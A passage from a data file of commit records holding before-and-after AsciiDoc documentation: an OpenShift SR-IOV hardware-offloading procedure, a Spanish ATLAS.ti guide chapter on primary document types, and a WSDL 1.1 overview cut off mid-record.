Application Id\n==== Request\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/http-request.adoc[]\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/path-parameters.adoc[]\n\n==== Response\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/http-response.adoc[]\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/response-fields.adoc[]\n\n==== Curl Example\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/curl-request.adoc[]","old_contents":"=== Get created invite by id\n==== Request\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/http-request.adoc[]\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/path-parameters.adoc[]\n\n==== Response\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/http-response.adoc[]\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/response-fields.adoc[]\n\n==== Curl Example\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/curl-request.adoc[]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"297247e1cb18b15903796a99588e05740e90f3c9","subject":"Fixing two build errors","message":"Fixing two build errors\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/nw-sriov-hwol-configuring-machine-config-pool.adoc","new_file":"modules\/nw-sriov-hwol-configuring-machine-config-pool.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/configuring-hardware-offloading.adoc\n\n:_content-type: PROCEDURE\n[id=\"configuring-machine-config-pool_{context}\"]\n= Configuring a machine config pool for hardware offloading\n\nTo enable hardware offloading, you must first create a dedicated machine config pool and configure it to work with the SR-IOV Network Operator.\n\n.Prerequisites\n\n* You installed the OpenShift CLI (`oc`).\n* You have access to the cluster as a user with the `cluster-admin` role.\n\n.Procedure\n\n. Create a machine config pool for machines you want to use hardware offloading on.\n\n.. Create a file, such as `mcp-offloading.yaml`, with content like the following example:\n+\n[source,yaml]\n----\napiVersion: machineconfiguration.openshift.io\/v1\nkind: MachineConfigPool\nmetadata:\n name: mcp-offloading <1>\nspec:\n machineConfigSelector:\n matchExpressions:\n - {key: machineconfiguration.openshift.io\/role, operator: In, values: [worker,mcp-offloading]} <1>\n nodeSelector:\n matchLabels:\n node-role.kubernetes.io\/mcp-offloading: \"\" <2>\n----\n<1> The name of your machine config pool for hardware offloading.\n<2> This node role label is used to add nodes to the machine config pool.\n\n.. Apply the configuration for the machine config pool:\n+\n[source,terminal]\n----\n$ oc create -f mcp-offloading.yaml\n----\n\n. Add nodes to the machine config pool. Label each node with the node role label of your pool:\n+\n[source,terminal]\n----\n$ oc label node worker-2 node-role.kubernetes.io\/mcp-offloading=\"\"\n----\n\n. Optional: To verify that the new pool is created, run the following command:\n+\n[source,terminal]\n----\n$ oc get nodes\n----\n+\n--\n.Example output\n[source,terminal]\n----\nNAME STATUS ROLES AGE VERSION\nmaster-0 Ready master 2d v1.23.3+d99c04f\nmaster-1 Ready master 2d v1.23.3+d99c04f\nmaster-2 Ready master 2d v1.23.3+d99c04f\nworker-0 Ready worker 2d v1.23.3+d99c04f\nworker-1 Ready worker 2d v1.23.3+d99c04f\nworker-2 Ready mcp-offloading,worker 47h v1.23.3+d99c04f\nworker-3 Ready mcp-offloading,worker 47h v1.23.3+d99c04f\n----\n--\n\n. Add this machine config pool to the `SriovNetworkPoolConfig` custom resource:\n\n.. Create a file, such as `sriov-pool-config.yaml`, with content like the following example:\n+\n[source,yaml]\n----\napiVersion: sriovnetwork.openshift.io\/v1\nkind: SriovNetworkPoolConfig\nmetadata:\n name: sriovnetworkpoolconfig-offload\n namespace: openshift-sriov-network-operator\nspec:\n ovsHardwareOffloadConfig:\n name: mcp-offloading <1>\n----\n<1> The name of your machine config pool for hardware offloading.\n\n.. Apply the configuration:\n+\n[source,terminal]\n----\n$ oc create -f <SriovNetworkPoolConfig_name>.yaml\n----\n+\n[NOTE]\n=====\nWhen you apply the configuration specified in a `SriovNetworkPoolConfig` object, the SR-IOV Operator drains and restarts the nodes in the machine config pool.\n\nIt might take several minutes for a configuration changes to apply.\n=====\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/configuring-hardware-offloading.adoc\n\n:_content-type: PROCEDURE\n[id=\"configuring-machine-config-pool_{context}\"]\n= Configuring a machine config pool for hardware offloading\n\nTo enable hardware offloading, you must first create a dedicated machine config pool and configure it to work with the SR-IOV Network Operator.\n\n.Prerequisites\n\n* You installed the OpenShift CLI (`oc`).\n* You have access to the cluster as a user with the `cluster-admin` role.\n\n.Procedure\n\n. Create a machine config pool for machines you want to use hardware offloading on.\n\n.. Create a file, such as `mcp-offloading.yaml`, with content like the following example:\n+\n[source,yaml]\n----\napiVersion: machineconfiguration.openshift.io\/v1\nkind: MachineConfigPool\nmetadata:\n name: mcp-offloading <1>\nspec:\n machineConfigSelector:\n matchExpressions:\n - {key: machineconfiguration.openshift.io\/role, operator: In, values: [worker,mcp-offloading <1>]}\n nodeSelector:\n matchLabels:\n node-role.kubernetes.io\/mcp-offloading <2>: \"\"\n----\n<1> The name of your machine config pool for hardware offloading.\n<2> This node role label is used to add nodes to the machine config pool.\n\n.. Apply the configuration for the machine config pool:\n+\n[source,terminal]\n----\n$ oc create -f mcp-offloading.yaml\n----\n\n. Add nodes to the machine config pool. Label each node with the node role label of your pool:\n+\n[source,terminal]\n----\n$ oc label node worker-2 node-role.kubernetes.io\/mcp-offloading=\"\"\n----\n\n. Optional: To verify that the new pool is created, run the following command:\n+\n[source,terminal]\n----\n$ oc get nodes\n----\n+\n--\n.Example output\n[source,terminal]\n----\nNAME STATUS ROLES AGE VERSION\nmaster-0 Ready master 2d v1.23.3+d99c04f\nmaster-1 Ready master 2d v1.23.3+d99c04f\nmaster-2 Ready master 2d v1.23.3+d99c04f\nworker-0 Ready worker 2d v1.23.3+d99c04f\nworker-1 Ready worker 2d v1.23.3+d99c04f\nworker-2 Ready mcp-offloading,worker 47h v1.23.3+d99c04f\nworker-3 Ready mcp-offloading,worker 47h v1.23.3+d99c04f\n----\n--\n\n. Add this machine config pool to the `SriovNetworkPoolConfig` custom resource:\n\n.. Create a file, such as `sriov-pool-config.yaml`, with content like the following example:\n+\n[source,yaml]\n----\napiVersion: sriovnetwork.openshift.io\/v1\nkind: SriovNetworkPoolConfig\nmetadata:\n name: sriovnetworkpoolconfig-offload\n namespace: openshift-sriov-network-operator\nspec:\n ovsHardwareOffloadConfig:\n name: mcp-offloading <1>\n----\n<1> The name of your machine config pool for hardware offloading.\n\n.. Apply the configuration:\n+\n[source,terminal]\n----\n$ oc create -f <SriovNetworkPoolConfig_name>.yaml\n----\n+\n[NOTE]\n=====\nWhen you apply the configuration specified in a `SriovNetworkPoolConfig` object, the SR-IOV Operator drains and restarts the nodes in the machine config pool.\n\nIt might take several minutes for a configuration changes to apply.\n=====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3af37fcc26916a76984ea9b0d089ae1d07ae67ba","subject":"Updates 04-1-tipos-de-documentos-primarios.adoc","message":"Updates 04-1-tipos-de-documentos-primarios.adoc\n\nAuto commit by GitBook Editor","repos":"jmunoz298\/atlasti,jmunoz298\/Atlasti7,jmunoz298\/Atlasti7,jmunoz298\/Atlasti7,jmunoz298\/atlasti,jmunoz298\/atlasti","old_file":"04-1-tipos-de-documentos-primarios.adoc","new_file":"04-1-tipos-de-documentos-primarios.adoc","new_contents":"[[tipos-de-documentos-primarios]]\n=== Tipos de documentos primarios\n\nComo hemos comentado en el cap\u00edtulo Introducci\u00f3n, _Documentos Primarios_ es el t\u00e9rmino que utiliza ATLAS.ti para hacer referencia a nuestras fuentes de datos, las cuales pueden ser de muy diferente tipo, pues podemos trabajar con una gran variedad de formatos: texto, imagen, audio, v\u00eddeo e incluso geo-referencias (Google Earth).\n\n[[texto]]\n==== Texto\n\nProbablemente los documentos de texto ser\u00e1n los que utilizaremos m\u00e1s habitualmente, ya se trate de transcripciones de entrevistas, observaciones, diarios de campo, documentos institucionales, etc. El programa permite la utilizaci\u00f3n de una gran diversidad de formatos de archivo, aunque nosotros nos ocuparemos \u00fanicamente de los m\u00e1s habituales.\n\n[[texto-plano]]\n===== Texto plano\n\nEl formato m\u00e1s b\u00e1sico de texto que podemos utilizar es el texto plano, es decir, archivos con extensi\u00f3n \u201c.txt\u201d que presentan la ventaja de ser el formato m\u00e1s est\u00e1ndar y compatible entre procesadores de texto pero que al mismo tiempo tiene el inconveniente de que no permite ning\u00fan tipo de edici\u00f3n de estilo como negritas, cursivas, etc.\n\n[[texto-enriquecido]]\n===== Texto enriquecido\n\nSe trata en este caso de archivos que permiten, al contrario de los anteriores, formatear el texto de forma que incluya desde negritas y cursivas hasta colores o im\u00e1genes. Aunque como dec\u00edamos, los tipos de\nformatos de archivo (o procesadores de texto) que podemos utilizar son numerosos, tenemos en esta ocasi\u00f3n tres categor\u00edas b\u00e1sicas.\n\nEn primer lugar, podemos utilizar archivos creados con diferentes procesadores de texto (Microsoft Word o Libre Office p.ej.). En este caso los formatos de archivo recomendados son los \u201c.doc\u201d y \u201c.rtf\u201d,\naunque recomendamos la utilizaci\u00f3n de este \u00faltimo puesto que este tipo de documentos (y tambi\u00e9n los .txt) permiten que realicemos cambios sobre los mismos desde el interior del programa (ver <<04-2-asignar-documentos-primarios#edicion-de-documentos, Edici\u00f3n de documentos>>).\n\nTambi\u00e9n podemos utilizar archivos en Portable Document Format (\u201c.pdf\u201d), que aunque estrictamente no se trate de archivos de texto enriquecido, en la pr\u00e1ctica tienen las mismas caracter\u00edsticas, puesto que pueden incluir cualquiera de las caracter\u00edsticas editables permitidas por un procesador de textos. Por supuesto se trata de un formato que no ser\u00e1 editable desde ATLAS.ti, pero que tiene la gran ventaja de que la visualizaci\u00f3n del documento ser\u00e1 siempre la misma (algo que puede no ocurrir con otros formatos), lo que resulta fundamental en determinados tipos de an\u00e1lisis.\n\nPor \u00faltimo, dentro de esta categor\u00eda de formatos enriquecidos encontramos los archivos \u201c.htm\u201d, es decir, documentos que hemos podido obtener directamente desde p\u00e1ginas web. La ventaja evidente de este tipo de archivos es que nos permite trabajar de una forma f\u00e1cil con datos extra\u00eddos directamente desde la web, sin necesidad de que tengamos que realizar sobre los mismos ning\u00fan proceso de transformaci\u00f3n o edici\u00f3n. Sin embargo, hay que tener en cuenta que no siempre obtendremos unos resultados id\u00e9nticos a lo que podamos ver en las p\u00e1ginas originales, puesto que no se conservar\u00e1n ni im\u00e1genes ni enlaces ni estilos. Por lo tanto, aunque se trata de una opci\u00f3n interesante consideramos que s\u00f3lo es pr\u00e1ctica para p\u00e1ginas web con formatos simples.\n\n[[multimedia]]\n==== Multimedia\n\nAdem\u00e1s de documentos textuales, podemos incluir como fuentes pr\u00e1cticamente cualquier otro tipo de datos, como im\u00e1genes fijas footnote:[Las im\u00e1genes pueden ser tanto documentos independientes como\nelementos incluidos en los archivos de tipo _.doc_, _.rtf_ y _.pdf_.], audio e incluso v\u00eddeo. Esta variedad de fuentes de datos nos permitir\u00e1 probablemente una mayor flexibilidad y riqueza en nuestro an\u00e1lisis. Una posibilidad que se nos abre con esta diversidad de formatos es la de utilizar la transcripci\u00f3n de una entrevista junto a su registro sonoro o audiovisual, de forma que, en caso de requerirlo, dispondremos de una informaci\u00f3n mucho m\u00e1s rica y precisa a la hora de realizar el an\u00e1lisis\nque si s\u00f3lo disponemos de la transcripci\u00f3n.\n\nUna de las funcionalidades m\u00e1s interesantes del programa es la sincronizaci\u00f3n entre documentos primarios textuales y audiovisuales. ATLAS.ti nos permite, por ejemplo, sincronizar una transcripci\u00f3n con su\ncorrespondiente archivo sonoro de forma que desde un punto concreto de la transcripci\u00f3n, podr\u00edamos acceder inmediatamente al mismo punto o momento en el documento de audio o v\u00eddeo (ver <<04-3-sincronizacion-audio-texto.adoc, Sincronizaci\u00f3n\naudio-texto>>).\n\n[[geo-referencias]]\n==== Geo-referencias\n\nDesde la versi\u00f3n 6 del programa, ATLAS.ti permite, literalmente, incluir \"el mundo\" como documento de datos. Aunque esta afirmaci\u00f3n puede parecer exagerada, en la pr\u00e1ctica es factible, puesto que podemos incorporar como documentos primarios mapas de __Google Earth__, en los que podemos, de la misma forma que hacemos con una imagen, seleccionar \"ubicaciones significativas\" para convertirlas en citas.\n","old_contents":"[[tipos-de-documentos-primarios]]\n=== Tipos de documentos primarios\n\nComo hemos comentado en el cap\u00edtulo Introducci\u00f3n, _Documentos Primarios_ es el t\u00e9rmino que utiliza ATLAS.ti para hacer referencia a nuestras fuentes de datos, las cuales pueden ser de muy diferente tipo, pues podemos trabajar con una gran variedad de formatos: texto, imagen, audio, v\u00eddeo e incluso geo-referencias (Google Earth).\n\n[[texto]]\n==== Texto\n\nProbablemente los documentos de texto ser\u00e1n los que utilizaremos m\u00e1s habitualmente, ya se trate de transcripciones de entrevistas, observaciones, diarios de campo, documentos institucionales, etc. El\nprograma permite la utilizaci\u00f3n de una gran diversidad de formatos de archivo, aunque nosotros nos ocuparemos \u00fanicamente de los m\u00e1s habituales.\n\n[[texto-plano]]\n===== Texto plano\n\nEl formato m\u00e1s b\u00e1sico de texto que podemos utilizar es el texto plano, es decir, archivos con extensi\u00f3n \u201c.txt\u201d que presentan la ventaja de ser el formato m\u00e1s est\u00e1ndar y compatible entre procesadores de texto pero que al mismo tiempo tiene el inconveniente de que no permite ning\u00fan tipo de edici\u00f3n de estilo como negritas, cursivas, etc.\n\n[[texto-enriquecido]]\n===== Texto enriquecido\n\nSe trata en este caso de archivos que permiten, al contrario de los anteriores, formatear el texto de forma que incluya desde negritas y cursivas hasta colores o im\u00e1genes. Aunque como dec\u00edamos, los tipos de\nformatos de archivo (o procesadores de texto) que podemos utilizar son numerosos, tenemos en esta ocasi\u00f3n tres categor\u00edas b\u00e1sicas.\n\nEn primer lugar, podemos utilizar archivos creados con diferentes procesadores de texto (Microsoft Word o Libre Office p.ej.). En este caso los formatos de archivo recomendados son los \u201c.doc\u201d y \u201c.rtf\u201d,\naunque recomendamos la utilizaci\u00f3n de este \u00faltimo puesto que este tipo de documentos (y tambi\u00e9n los .txt) permiten que realicemos cambios sobre los mismos desde el interior del programa (ver Edici\u00f3n de documentos en p\u00e1g. 54).\n\nTambi\u00e9n podemos utilizar archivos en Portable Document Format (\u201c.pdf\u201d), que aunque estrictamente no se trate de archivos de texto enriquecido, en la pr\u00e1ctica tienen las mismas caracter\u00edsticas, puesto que pueden incluir cualquiera de las caracter\u00edsticas editables permitidaspor un procesador de textos. Por supuesto se trata de un formato que no ser\u00e1 editable desde ATLAS.ti, pero que tiene la gran ventaja de que la visualizaci\u00f3n del documento ser\u00e1 siempre la misma (algo que puede no ocurrir con otros formatos), lo que resulta fundamental en determinados tipos de an\u00e1lisis.\n\nPor \u00faltimo, dentro de esta categor\u00eda de formatos enriquecidos encontramos los archivos \u201c.htm\u201d, es decir, documentos que hemos podido obtener directamente desde p\u00e1ginas web. La ventaja evidente de este tipo\nde archivos es que nos permite trabajar de una forma f\u00e1cil con datos extra\u00eddos directamente desde la web, sin necesidad de que tengamos que realizar sobre los mismos ning\u00fan proceso de transformaci\u00f3n o edici\u00f3n. Sin embargo, hay que tener en cuenta que no siempre obtendremos unos resultados id\u00e9nticos a lo que podamos ver en las p\u00e1ginas originales, puesto que no se conservar\u00e1n ni im\u00e1genes ni enlaces ni estilos CSS. Por lo tanto, aunque se trata de una opci\u00f3n interesante consideramos que s\u00f3lo es pr\u00e1ctica para p\u00e1ginas web con formatos simples.\n\n[[multimedia]]\n==== Multimedia\n\nAdem\u00e1s de documentos textuales, podemos incluir como fuentes pr\u00e1cticamente cualquier otro tipo de datos, como im\u00e1genes fijas footnote:[Las im\u00e1genes pueden ser tanto documentos independientes como\nelementos incluidos en los archivos de tipo __.doc, __.rtf y *.pdf.], audio e incluso v\u00eddeo. Esta variedad de fuentes de datos nos permitir\u00e1 probablemente una mayor flexibilidad y riqueza en nuestro an\u00e1lisis. Una posibilidad que se nos abre con esta diversidad de formatos es la de utilizar la transcripci\u00f3n de una entrevista junto a su registro sonoro o audiovisual, de forma que, en caso de requerirlo, dispondremos de una informaci\u00f3n mucho m\u00e1s rica y precisa a la hora de realizar el an\u00e1lisis\nque si s\u00f3lo disponemos de la transcripci\u00f3n.\n\nUna de las funcionalidades m\u00e1s interesantes del programa es la sincronizaci\u00f3n entre documentos primarios textuales y audiovisuales. ATLAS.ti nos permite, por ejemplo, sincronizar una transcripci\u00f3n con su\ncorrespondiente archivo sonoro de forma que desde un punto concreto de la transcripci\u00f3n, podr\u00edamos acceder inmediatamente al mismo punto o momento en el documento de audio o v\u00eddeo (ver Sincronizaci\u00f3n\naudio-texto, p\u00e1g. 58).\n\n[[geo-referencias]]\n==== Geo-referencias\n\nDesde la versi\u00f3n 6 del programa, ATLAS.ti permite, literalmente, incluir 'el mundo' como documento de datos. Aunque esta afirmaci\u00f3n puede parecer exagerada, en la pr\u00e1ctica es factible, puesto que podemos incorporar como documentos primarios mapas de __Google Earth__, en los que podemos, de la misma forma que hacemos con una imagen, seleccionar 'ubicaciones significativas' para convertirlas en citas.\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d9cb9044be402ec7dfbdd08aa87c6fd37372aac2","subject":"Parent","message":"Parent\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"WSDL.adoc","new_file":"WSDL.adoc","new_contents":"= WSDL in brief\n:toc: preamble\n:sectanchors:\n\/\/works around awesome_bot bug that used to be published at github.com\/dkhamsing\/awesome_bot\/issues\/182.\n:emptyattribute:\n\nThis document gives a _rough_ and _incomplete_ overview of WSDL 1.1. (WSDL 2.0 being not much supported at the moment.)\n\nNOTE: The reader supposedly has basic knowledge of link:HTTP.adoc[HTTP], XML and link:SOAP.adoc[SOAP].\n\nNOTE: The parts marked BP are complements to the spec given by WS-I BP (all versions from 1.0 to 2.0) (see <<refs>>).\n\n\/\/\/\/\nTODO Find out how to escape bracket in [Public domain]; C++.\nLink image to https:\/\/commons.wikimedia.org\/wiki\/File:WSDL_11vs20.png\nReturn value?\nsoapAction may be left undefined?\nportType \u21d0 binding \u21d0 port \u21d0 soap:address\n\/\/\/\/\n\n== Overview\nThe Web Services Description Language (WSDL) spec defines a WSDL document. A WSDL document is an XML document that describes a web service, abstractly and concretely.\n\nExcept when mentioned otherwise, the elements this document refers to are XML elements with WSDL namespace [small]#(`\\http:\/\/schemas.xmlsoap.org\/wsdl\/`)#.\n\n.WSDL 1.1 (derived from work by Cristcost [Public domain], via Wikimedia Commons)\nimage:WSDL_11.png[Under a WSDL 1.1 document: an abstract description (types, message, portType), and a concrete description (binding, service)., float=\"left\"]\n\n* An abstract description indicates the operations that the web service provides, and the types it uses.\n** The types it uses are defined under `types` and `message` elements.\n** The operations are grouped together in `portType` elements. Though obscurely named, a `portType` simply represents a set of operations that coherently fit together (think about interfaces in Java, or abstract classes in C++).\n** A WSDL file may define several such `portType` elements.\n* A concrete description indicates how those abstract operations must be invoked, by linking them to an underlying exchange protocol, using a _link-type_.\n** This is done using two elements: `binding`, that makes operations concrete (and specify how to encode types, \u2026), and `service`, that defines concrete endpoints. (Those two elements may appear several times in a document.)\n** A `service` contains a list of `port` elements. A `port`, or \u201cendpoint\u201d, indicates where the web service is to be reached.\n** The elements used inside the `binding` and `service` elements depend on the underlying exchange protocol adopted by the web service being described, thus, depend on the chosen link-type.\n* WSDL defines three link-types to make abstract descriptions concrete: SOAP, HTTP GET\/POST and MIME. [small]#(It also defines an extension mechanism permitting to define more such link-types.)# This document only describes the SOAP link-type.\n\nSee https:\/\/www.w3.org\/TR\/2001\/NOTE-wsdl-20010315#_wsdl[Example 1] (W3C).\n\n== Internal references\nMany WSDL elements admit an optional `name` attribute. XML Elements which admit a name may be referred to using a Qualified Name (QName). For example, the element `<portType name=\"StockQuotePortType\">` defined in a namespace recognized under the prefix `tns` can be referred to by the QName `tns:StockQuotePortType` (see https:\/\/www.w3.org\/TR\/2001\/NOTE-wsdl-20010315#_soap-e[Example 3]).\n\n== Types and messages\nXML schema are typically used to define types. The types to be used can be defined under `types`, using the `xsd:schema` element (thus XSD import mechanisms may be used in the usual manner). [small]#(WSDL also allows for other type systems.)#\n\nThe types are used to define messages, using `message` elements.\n\n* A message consists of `part` elements.\n* Each `part` has a name, and indicates either an `element` QName or a `type` QName (that must be defined in a schema under the `types` element, see above).\n* How the parts are used depends on the link-type (see below). Typically, each part is a parameter of some operation or used as return value.\n\n== Operations\nAn operation has a name, (usually) an input message, possibly an output message, and possibly fault messages. When output and fault messages are defined, it is to be understood that either the output or a fault will be returned, not both. Each of the `input`, `output` and `fault` elements designate the corresponding message using a QName.\n\n== SOAP link-type\nThe SOAP link-type is used to complement an abstract web service description (consisting in `types`, `message` and `portType` elements) in order to make it a description of a SOAP web service. The SOAP binding used is the HTTP one (see link:SOAP.adoc#HTTP_binding[SOAP in brief]). [small]#(WSDL tolerates other SOAP bindings as well.)# Such a link is done using one `binding` element per `portType` to be defined as a component of the SOAP web service, and one `service` element.\n\nThe `binding` element is used to specify how abstract messages sent to or from an abstract interface (defined as a `portType`) are to be serialized as SOAP messages.\n\n* The `binding` indicates, as its `type`, the QName of the `portType` it relates to (for example, `<binding type=\"tns:StockQuotePortType\">`).\n* The `binding` indicates that the link-type is SOAP by including as a sub-element the element `soap:binding`, where the `soap` prefix corresponds to the WSDL namespace for WSDL SOAP link-type [small]#(\\http:\/\/schemas.xmlsoap.org\/wsdl\/soap12\/)#.\n* The `soap:binding` sub-element has a `transport` attribute, whose value is typically `\\http:\/\/schemas.xmlsoap.org\/soap\/http`, to indicate that the HTTP binding is chosen as a SOAP binding.\n* The `soap:binding` sub-element has a `style` attribute, whose value may be `document` (default) or `rpc`. [small]#(The `style` may also be set per-operation instead of for a whole `portType`.)#\n* The `binding` element has one `operation` sub-element per operation that is to be reachable by SOAP. That sub-element specifies linking information for the _abstract_ operation with the same name within the related `portType`. Each such `operation` element has a `<soap:operation soapAction=\"uri\"\/>` sub-element that specifies the SOAP action to use to target that operation. Each `operation` also has sub-elements for each of the input, output and faults defined in the corresponding abstract operation, with for each of those a sub-element `soap:body` that, for `rpc` style, specifies a namespace (BP). Unbound parts are discouraged and should be ignored (BP http:\/\/ws-i.org\/Profiles\/BasicProfile-2.0-2010-11-09.html#R2209[R2209]{emptyattribute}).\n\nHere is how to interpret these informations (BP).\n\nWith `document` style, there can be at most one message part in a message [small]#(unless `soap:body` `part` attribute is used)#. That part must be defined using the `element` attribute. It appears directly under the SOAP Body element.\n\nWith `rpc` style, each part is a parameter or a return value. Parts must be defined using the `type` attribute. The SOAP Body element will contain an operation wrapper element containing, for each part, a part wrapper element followed by the content of the part: `<opName><part1>\u2026<\/part1><part2>\u2026<\/part2><\/opName>`. The operation wrapper element namespace is the value of the namespace attribute of the `soap:body` element and its local name is either the name of the operation, for a SOAP Request, or the name of the operation suffixed with \u201cResponse\u201d. The `name` and `type` attributes of `part` elements define the local name and type of the corresponding part wrapper. Part wrappers have no namespace.\n\nDocument style is http:\/\/ws-i.org\/Profiles\/BasicProfile-2.0-2010-11-09.html#Consistency_of_style_Attribute[encouraged].\n\nBP mandates unique operation signatures, so that an endpoint may identify which operation is invoked based on the input message. The operation signature is the fully qualified name of the child element of the SOAP body [small]#(assuming no wsa:Action SOAP header blocks are used)#.\n\nThe `service` element consists in a set of `port` elements. Each `port` refers to a given `binding` element using a QName.\nA sub-element of `port` gives the SOAP HTTP address to use to call the SOAP web service: `soap:address location=\"uri\"`.\n\n[[refs]]\n== Refs\n* W3C https:\/\/www.w3.org\/TR\/2001\/NOTE-wsdl-20010315[WSDL 1.1] note; https:\/\/www.w3.org\/Submission\/2006\/SUBM-wsdl11soap12-20060405\/[WSDL 1.1 to SOAP 1.2] link-type\n* WSDL https:\/\/www.w3.org\/TR\/?title=wsdl[Specifications] on W3C\n* Web Services Interoperability (http:\/\/www.ws-i.org\/[WS-I]) Basic Profile (BP) clarifies and modifies WSDL and related specifications to promote interoperability.\n\/\/* BP 2.0 corrected http:\/\/ws-i.org\/profiles\/basic\/1.1\/wsdl-2004-08-24.xsd[WSDL schema] TODO check 2.0 or 1.1?\n\n== Supplementary details\nWhat this document calls a link-type, namely the type of relation between the abstract and the concrete web service descriptions, is usually referred to as a _binding_. This presents risks of confusion with the WSDL `binding` element. Here the word \u201cbinding\u201d is only used to refer to the element.\n\nThe WSDL element `import` can be used to import WSDL documents into other WSDL documents. (The spec also allows to use the WSDL `import` element to import XSD schemas, but this is now discouraged, see http:\/\/www.ws-i.org\/Profiles\/BasicProfile-1.0-2004-04-16.html#refinement16498504[BP 1.0] and later versions. The XSD import mechanism should be preferred.)\n\nIn WSDL 2.0, `portType` is called `interface`, `port` is called `endpoint`.\n\nEach of the operation message (input, \u2026) in a SOAP link-type has a `soap:body` whose `use` must (http:\/\/ws-i.org\/Profiles\/BasicProfile-2.0-2010-11-09.html#R2706[BP 2.0], 1.1) be `literal` (or left to the default, `literal`, BP 1.2). (`encoded` is not used any more, see this https:\/\/docs.microsoft.com\/en-us\/previous-versions\/dotnet\/articles\/ms995710(v=msdn.10)[opinion]).\n\nBP 2.0 does not require the sender to set soapAction in the HTTP header nor as part of the Content-Type header. Thus, it may not be relied upon.\n\nAn operation can be classified as: One-way (input only); Request-response (with input, output, and possibly fault messages); or other two types (that this document is not concerned with).\n\n","old_contents":"= WSDL in brief\n:toc: preamble\n:sectanchors:\n\/\/works around awesome_bot bug that used to be published at github.com\/dkhamsing\/awesome_bot\/issues\/182.\n:emptyattribute:\n\nThis document gives a _rough_ and _incomplete_ overview of WSDL 1.1. (WSDL 2.0 being not much supported at the moment.)\n\nNOTE: The reader supposedly has basic knowledge of link:HTTP.adoc[HTTP], XML and link:SOAP.adoc[SOAP].\n\nNOTE: The parts marked BP are complements to the spec given by WS-I BP (all versions from 1.0 to 2.0) (see <<refs>>).\n\n\/\/\/\/\nTODO Find out how to escape bracket in [Public domain]; C++.\nLink image to https:\/\/commons.wikimedia.org\/wiki\/File:WSDL_11vs20.png\nReturn value?\nsoapAction may be left undefined?\nportType \u21d0 binding \u21d0 port \u21d0 soap:address\n\/\/\/\/\n\n== Overview\nThe Web Services Description Language (WSDL) spec defines a WSDL document. A WSDL document is an XML document that describes a web service, abstractly and concretely.\n\nExcept when mentioned otherwise, the elements this document refers to are XML elements with WSDL namespace [small]#(`\\http:\/\/schemas.xmlsoap.org\/wsdl\/`)#.\n\n.WSDL 1.1, derived from work by Cristcost [Public domain\\], via Wikimedia Commons\nimage:WSDL_11.png[Under a WSDL 1.1 document: an abstract description (types, message, portType), and a concrete description (binding, service)., float=\"left\"]\n\n* An abstract description indicates the operations that the web service provides, and the types it uses.\n** The types it uses are defined under `types` and `message` elements.\n** The operations are grouped together in `portType` elements. Though obscurely named, a `portType` simply represents a set of operations that coherently fit together (think about interfaces in Java, or abstract classes in C++).\n** A WSDL file may define several such `portType` elements.\n* A concrete description indicates how those abstract operations must be invoked, by linking them to an underlying exchange protocol, using a _link-type_.\n** This is done using two elements: `binding`, that makes operations concrete (and specify how to encode types, \u2026), and `service`, that defines concrete endpoints. (Those two elements may appear several times in a document.)\n** A `service` contains a list of `port` elements. A `port`, or \u201cendpoint\u201d, indicates where the web service is to be reached.\n** The elements used inside the `binding` and `service` elements depend on the underlying exchange protocol adopted by the web service being described, thus, depend on the chosen link-type.\n* WSDL defines three link-types to make abstract descriptions concrete: SOAP, HTTP GET\/POST and MIME. [small]#(It also defines an extension mechanism permitting to define more such link-types.)# This document only describes the SOAP link-type.\n\nSee https:\/\/www.w3.org\/TR\/2001\/NOTE-wsdl-20010315#_wsdl[Example 1] (W3C).\n\n== Internal references\nMany WSDL elements admit an optional `name` attribute. XML Elements which admit a name may be referred to using a Qualified Name (QName). For example, the element `<portType name=\"StockQuotePortType\">` defined in a namespace recognized under the prefix `tns` can be referred to by the QName `tns:StockQuotePortType` (see https:\/\/www.w3.org\/TR\/2001\/NOTE-wsdl-20010315#_soap-e[Example 3]).\n\n== Types and messages\nXML schema are typically used to define types. The types to be used can be defined under `types`, using the `xsd:schema` element (thus XSD import mechanisms may be used in the usual manner). [small]#(WSDL also allows for other type systems.)#\n\nThe types are used to define messages, using `message` elements.\n\n* A message consists of `part` elements.\n* Each `part` has a name, and indicates either an `element` QName or a `type` QName (that must be defined in a schema under the `types` element, see above).\n* How the parts are used depends on the link-type (see below). Typically, each part is a parameter of some operation or used as return value.\n\n== Operations\nAn operation has a name, (usually) an input message, possibly an output message, and possibly fault messages. When output and fault messages are defined, it is to be understood that either the output or a fault will be returned, not both. Each of the `input`, `output` and `fault` elements designate the corresponding message using a QName.\n\n== SOAP link-type\nThe SOAP link-type is used to complement an abstract web service description (consisting in `types`, `message` and `portType` elements) in order to make it a description of a SOAP web service. The SOAP binding used is the HTTP one (see link:SOAP.adoc#HTTP_binding[SOAP in brief]). [small]#(WSDL tolerates other SOAP bindings as well.)# Such a link is done using one `binding` element per `portType` to be defined as a component of the SOAP web service, and one `service` element.\n\nThe `binding` element is used to specify how abstract messages sent to or from an abstract interface (defined as a `portType`) are to be serialized as SOAP messages.\n\n* The `binding` indicates, as its `type`, the QName of the `portType` it relates to (for example, `<binding type=\"tns:StockQuotePortType\">`).\n* The `binding` indicates that the link-type is SOAP by including as a sub-element the element `soap:binding`, where the `soap` prefix corresponds to the WSDL namespace for WSDL SOAP link-type 